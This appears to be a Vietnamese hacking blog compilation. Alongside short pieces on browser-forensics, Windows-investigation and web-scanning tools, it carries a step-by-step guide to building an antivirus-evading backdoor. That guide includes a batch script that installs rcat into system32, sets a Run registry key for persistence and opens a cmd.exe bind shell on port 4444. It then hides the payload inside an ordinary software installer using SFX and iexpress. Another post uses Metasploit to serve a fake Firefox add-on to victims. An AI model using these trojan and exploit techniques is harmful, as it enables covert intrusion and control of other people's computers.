Browser Forensic tool v2.0 – đào bới history của trình duyệt

Browser Forensic tool v2.0 được phát triển bời DarkCoderSc (Jean-Pierre LESUEUR), là một công cụ phân tích history của trình duyệt. Trong thời gian ngắn, công cụ sẽ trích xuất chính xác history của IE, Chrome, Firefox , Rockmeit, comodo và opera theo keyword có sẵn.

BFT sẽ tìm kiếm các keyword trong history và đưa ra kết quả dựa theo URL và title của nó.   Trong ví dụ dưới, ta tìm kiếm history liên quan đến profile hacker :

 

Trong quá trình scan, tất cả các trình duyệt sẽ được đóng. Sau khi quá trình scan kết thúc, sẽ có 1 report về các kết quả tìm được dựa trên các trình duyệt khác nhau:

Công cụ đồng thời cũng cung cấp khả năng thay đổi hoặc thêm keyword phù hợp với mục đích của người thực hiện forensic.

BFT có thể được download tại đây .

Radiography

Radiography là một công cụ điều tra với mục đích lấy càng nhiều thông tin từ hệ thống Windows càng tốt. RadioGraphu là một công cụ mã nguồn mở vừa được cung cấp dưới dạng giao diện và CLI version.

Radiography có khả năng lấy các thông tin về :
- Registry keys liên quan đến các tiến trình startup
- Registry key setting của Internet explorer
- Các tài khoản hệ thống và đặc tính của nó
- Các file startup
- Các services của hệ thống
- Nội dung hosts file
- Các task trong TaskScheduler
- Các driver đã load trên hệ thống
- Thông tin NetBios share
- Các cửa số windows đang ở chế độ hidden
- Các process đang chạy và vị trí của nó
- Thông tin về network

 

Trong quá trình hoạt động, RadioGraphy sử dụng mã hash và kiểm tra với Team Cymru’s MALWARE HASH REGISTRY để xác định xem đối tượng có gây hại hay không.

Tạo backdoor vượt mặt antivirus

Việc tạo backdoor qua mặt các antivirus (thuật ngữ FUD) thực ra không còn mới nữa, nếu các bạn search sẽ thấy rất nhiều bài viết về vấn đề này: mã hóa, đóng gói lại… Hôm nay mình sẽ giới thiệu với các bạn một phương pháp khá đơn giản để thả backdoor vào máy victim, cũng có chút vượt mặt antivirus nhưng chỉ là hầu hết antivirus thôi

Backdoor chúng ta sử dụng là rcat.exe, backdoor này được dùng thay thế cho netcat vì mục đích FUD. Kịch bản của chúng ta là làm sao vứt con này vào máy victim, cho nó chạy để nó mở cổng cho ta vào.

Trước tiên các bạn download rcat.exe tại đây (chỉ lấy rcat.exe)

Sau đó mở notepad tạo 1 đoạn script có nội dung như sau:

@echo off
copy rcat.exe %systemroot%\system32\rcat.exe
if errorlevel 0 goto regedit
goto error
:regedit
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\rcat.exe -L -d -p 4444 -e cmd.exe"
if errorlevel 0 goto ip
:error
echo something wrong with the program.
goto end
:ip
echo write down the IP address from the table
ipconfig
:end
echo end.
rcat -L -d -p 4444 -e cmd.exe

Save file này dạng ten.bat đặt chung thư mục với rcat.exe

Nén 2 file này với winRAR, các bạn lưu ý là tich vào Create SFX archive để tạo file exe

Chuyển qua tab Advance, chọn SFX option và điển như sau trong tab General

Điền tên file bat của các bạn trong tab Setup

Chọn Hide all trong tab modes

OK, vậy là ta đã file exe

Tiếp đến cần đóng gói file này với 1 file setup bình thường (setup nào cũng đc), mục đích là khi victim cài phần mềm thì vô tình cài cả backdoor của chúng ta

Để làm việc này, các bạn vào run gõ iexpress, rồi cứ đế mặc định nhấn Next cho đến Package Title, cứ điên bừa một cái gì đó rồi Next vài lần đến mục Packaged Files

Tại đây các bạn add 2 file: file backdoor exe mà chúng ta tạo ra và 1 file setup bất kỳ rồi Next

Tiếp đến, ta chọn Install Progam là setup thông thường, chọn Post install command là backdoor

Next tiếp, kế đến chọn Hidden và Next tiếp

Đến Package Name and Options, các bạn chọn đường dẫn cho file sắp tạo  và nhớ tick vào lựa chọn như hình dưới

Tiếp đến chọn No restart, don’t save, Next và chờ cho nó đóng gói xong

OK, h bạn đã có file exe mới chứa trong nó 1 setup thông thường, 1 backdoor.Kết quả khi check trên virustotal

Việc kế là phân phát cho victim

Giả sử victim cài đặt cái này, setup thông thường vẫn cài như bình thường, vẫn ra sản phẩm xyz nào đó, tuy nhiên backdoor của chúng ta đã âm thầm được cài vào máy victim, tự kích hoạt và chạy cùng win của hắn. Giả sử victim đã cài, chúng ta chỉ cần telnet vào thôi (Khuyến cáo các bạn nên dùng linux đế telnet vào, vì nếu bạn dùng windows telnet vào máy victim thì màn hình console sẽ tối thui, không nhìn được text đâu.

Sử dụng metasploit fake addon của firefox

Gần đây mình có đọc bài viết này của anh http://www.clshack.com thấy rất hay nên mình viết bài  này giới thiệu với các bạn. Anh ý viết bài tiếng Tây Ban Nha hay latin gì đó nên nếu các bạn ngại translate có thể theo dõi bài viết của mình

Trước tiên chúng ta cần update metaspoit

Đối với các bản backtrack cũ chỉ cần chạy ./msfupdate, các bản Backtrack sau này các bạn chỉ có thể update qua svn, trong trường hợp của mình, cách làm như sau:

cd /pentest/exploits/framework/
svnupdate

rồi, chúng ta và msfconsole và search firefox xpi

Một lô danh sách xổ ra, ta chọn

use exploit/multi/browser/firefox_xpi_bootstrapped_addon

Show options xem sao:

Có nhiều option nhưng ta chỉ cần lưu ý đến ADDONNAME và URIPATH.

Ta set tên addon trước

set ADDONNAME XSSBlocker antoanthongtin.org

Và set lại đường dẫn chứa addon, việc này giúp chúp ta loại bỏ phần râu ria phía sau URL

set URIPATH /

OK, exploit thôi

Chúng ta đã dựng được server chứa addon, kế đến là gửi link này cho victim, các bạn có thể áp dụng các biện pháp ARP Possoining hoặc các biện pháp che dấu URL nhằm đánh lừa victim.

Giả sử victim vào link này và cài đặt addon (mình dùng firefox bản mới nhất để thử)

Khi cài đặt thành công, bên phía kẻ tấn công sẽ thấy

Ta thử xem sessions có hay không

Ngon rồi, tương tác thôi:

Làm quen với công cụ dò quét Web-sorrow

Web-sorrow là công cụ được viết trên nền perl với mục đích scan webserver tìm kiếm các lỗi cấu hình, phát hiện phiên bản, enumeration và những thông tin khác. Tuy công cụ này không thực hiện việc dò quét lỗ hổng bảo mật, DdoS hoặc các tác vụ mang thiên hướng tấn công tuy nhiên chúng ta cũng có thể tham khảo công cụ này với một vài tác vụ nhất định.

Các bạn có thể download tại đây

Một số chức năng của Web-sorrow

• -s : Standard, bao gồm các bài kiểm tra mặc định ví dụ như banner grabbing, phát hiện ngôn ngữ, robots.txt.
• -Eb : error bagging, kiểm tra tìm kiếm các trang báo lỗi (qua các trang này có thể thu thập thông tin về server, hệ điều hành và nhiều thông tin quan trọng khác)
• -auth: authentication, tìm kiếm trang đăng nhập, việc này rất quan trọng nếu bạn muốn brute force hoặc đăng nhập khi sau khi exploit và tìm ra acc/pass của admin.
• -Ws: Kiểm tra các web service như hosting, blog, favicon fingerprinting, và thông tin phiên bản cms
• -proxy: set proxy cho tất cả kết nối HTTP
• -e: Chạy tất cả các lựa chọn

Ví dụ

1. Tìm thông tin server

Cú pháp

perl Wsorrow.pl -host [taget site] -S

2. Tìm trang login

Cú pháp

perl Wsorrow.pl -host [taget site] -auth